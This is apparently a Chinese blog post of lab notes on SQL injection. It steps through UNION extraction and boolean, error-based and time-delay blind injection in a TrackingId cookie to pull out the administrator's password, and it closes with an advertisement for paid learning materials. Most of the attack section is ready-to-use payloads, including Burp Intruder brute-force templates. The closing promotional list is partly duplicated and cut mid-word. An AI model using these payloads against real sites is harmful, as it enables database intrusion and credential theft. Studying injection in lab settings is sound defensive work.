-
'+UNION+SELECT+tablename,NULL+FROM+informationschema.tables–
-
查到users_yxcapd 可能包含username or passwd informations
-
查询列名字
-
‘+UNION+SELECT+columnname,NULL+FROM+informationschema.columns+where+tablename='usersyxcapd’–
-
得到 passworduuqjjs and usernamefrlczf two columns name
-
查询内容
-
'+UNION+SELECT+passworduuqjjs,usernamefrlczf+FROM+users_yxcapd–
- 基于响应的盲注手动测试
注意引号的闭合
-
注入点判断
-
TrackingId=xyz’ AND ‘1’='1
-
TrackingId=xyz’ AND ‘1’='2
-
判断是否存在users表
-
TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)='a
-
SELECT ‘a’ FROM users 这一部分表示 返回’a’ 常量 ,若users存在,则返回a 。 若不存在则页面出错。(测试时使用的网页表现为若正常则返回welcome ,否则没有welcome)
-
limit 1 表示 无论有多少数据 只返回第一行 ,不对列进行操作
-
即:只有users表存在的时候 ,逻辑关系是 ‘a’='a’成立,才会返回welcom。
-
判断是否存在administrator用户
-
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)='a
-
SELECT ‘a’ FROM users 这一部分恒真
-
WHERE username=‘administrator’ 若存在则真 逻辑关系’a’='a’才成立返回welcome。
-
判断administrator的密码长度
-
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)='a
-
SELECT ‘a’ FROM users 恒真
-
WHERE username=‘administrator’ 恒真
-
LENGTH(password)>1) 模糊测试 若密码长度大于1则为真,逻辑关系’a’='a’成立。返回welcome
-
继续判断
-
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>3)='a 不断修改password>i (i∈1 2 3 4 ……)
-
确定密码长度后确定密码每个位置的字符
-
TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='a
-
SELECT SUBSTRING(password,1,1) substring为子串函数,表示password的第1个字符匹配1位 。
-
通过不断修改substring(password,2,1) 的数值,来逐个判断出每个字符串的具体字符。
-
burpsuite添加字符逐个爆破
-
TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='§a§
-
思路------通过修改substring(password,i,1) i处的数值,来判断是否等于最后结尾处的§a§
-
§a§ 的范围设置在a-z,0-9之间
-
即: substring(password,i,1) 当i等于1时,表示 密码中的第一位字符 去匹配a-z,1-9 看看是否界面返回了welcome–这一功能我们可以在inthder模块中的grep 匹配中设置我们需要匹配的字符来实现。适用情况:SQL查询的结果不返回,也不显示错误信息。但如果查询返回任何行,应用程序会在页面中包含一条“欢迎回来”消息。
- 基于错误的盲注手动测试
- 判断是否存在注入点
- TrackingId=xyz**'**
- 加 ’ 查看是否报错
- 再次判断
- TrackingId=xyz**‘’**
- 加双 单引号 查看错误是否消失
- 若消失则可以说明 ’ 产生了作用,表明语法错误(在本例中为未闭合的引号)对响应产生了可检测到的影响
- 尝试
- TrackingId=xyz’||(SELECT ’ ')||’ 其中 ||为字符串拼接 相当于在后面拼接了一个空白,不产生任何作用
- 上述发生报错,说明,数据库不支持该格式,修改
- TrackingId=xyz’||(SELECT ‘’ FROM dual)||’ dual表是Oracle特有的表 .响应无报错 说明该数据库为Oracle
- 这要求所有
SELECT
语句显式指定表名-----Oracle特有 - 在判断完数据库后,验证是否确实存在注入
- TrackingId=xyz’||(SELECT ‘’ FROM not-a-real-table)||’ 其中 not-a-real-table是一个不存在的表
- 上述出现报错. 此行为强烈表明后端正在将注入作为 SQL 查询进行处理。
- 判断表名
- TrackingId=xyz’||(SELECT ‘’ FROM users WHERE ROWNUM = 1)||’ 查看users表是否存在
- 若没有返回错误,这说明该表确实存在
- 其中 rownum函数 相当于 MySQL中的 limit 1 都表示返回一行. 但是在Oracle中没有limit函数。故而采用其他函数进行平替
- 添加rownum函数的目的在于防止查询返回多于一行,这会破坏我们的串联。
- 测试 case end 该测试条件是否可以响应
- TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —若响应则应报错
- TrackingId=xyz’||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —修改判断条件,报错消失。表明可以根据特定条件的真实性有条件地触发错误
- 判断administrator用户是否存在
- TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —若存在则报错
- 判断密码长度
- TrackingId=xyz’||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
- burpsuite 判断字符
- TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘a’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
- TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
- TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —修改数值判断…….
- TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,§2§,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ ****把两处都添加为变量进行破解
- 第一处为1-20 从密码长度得出。
- 第二处改为a-z 0-9 A-Z
- 基于可见错误的盲注手动测试
- 判断是否存在注入点
- TrackingId=ogAZZfxtOKUELbuJ’ 是否出现错误
- TrackingId=ogAZZfxtOKUELbuJ’’ 错误是否消失
- 判断TrackingId=ogAZZfxtOKUELbuJ’-- 错误是否消失 这里说明注释起到了作用 —这里出现了报错信息的回显,表明可以利用报错注入
- 构造报错语句
- ’ AND CAST((SELECT 1) AS int)-- 这里的cast()函数可以修改数据的数据类型
- 即: 把 1 转化为整数类型 运行后发现报错([ERROR: argument of AND must be type boolean, not type integer](ERROR: argument of AND must be type boolean, not type integer)) 根据报错可知 and 后面必须是一个布尔型的数据类型
- 根据报错进行构造
- ’ AND **1=**CAST((SELECT 1) AS int)-- 报错消失,说明构造的语句发挥了作用
- ’ AND 1=CAST((SELECT username FROM users) AS int)-- 再次进行构造,尝试获取username —出现报错
- 报错信息(Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = ‘fOPoniV9hYwm4fZ3’ AND 1=CAST((SELECT username FROM users) AS’. Expected char)
- 这说明字符数过于多,尝试删除cookie来空出字符
- TrackingId=’ AND 1=CAST((SELECT username FROM users) AS int)-- 报错信息变更,说明更改产生了作用
- 报错信息([ERROR: more than one row returned by a subquery used as an expression](ERROR: more than one row returned by a subquery used as an expression)) 这表明返回不仅一行
- TrackingId=’ AND 1=CAST((SELECT username FROM users limit 1) AS int)-- —再次进行构造,限制返回行数
- 出现错误信息([ERROR: invalid input syntax for type integer: “administrator”](ERROR: invalid input syntax for type integer: “administrator”)) —这返回了第一个用户administrator
- 即:泄漏了表中的第一个用户名
- 获取密码
- ’ AND 1=CAST((SELECT password FROM users limit 1) AS int)-- —构造语句获取密码
- 报错信息([ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”](ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”))
- 带有时间延迟和信息检索的盲注手动测试
- 判断是否存在时间盲注
- trackingId=x’ ; SELECT+CASE+WHEN+(1=1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END–
- 若存在时间盲注则该响应会等待十秒才会响应
- TrackingId=x’%3BSELECT+CASE+WHEN+(1=2)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END-- 验证是否是因为语句延迟(排除网络因素)
- 判断用户名
- TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
- 延迟存在 , 说明存在administrator用户
- 判断密码长度
- TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+LENGTH(password)>1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
- 多次测试 最终确定密码长度为20
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
oid移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**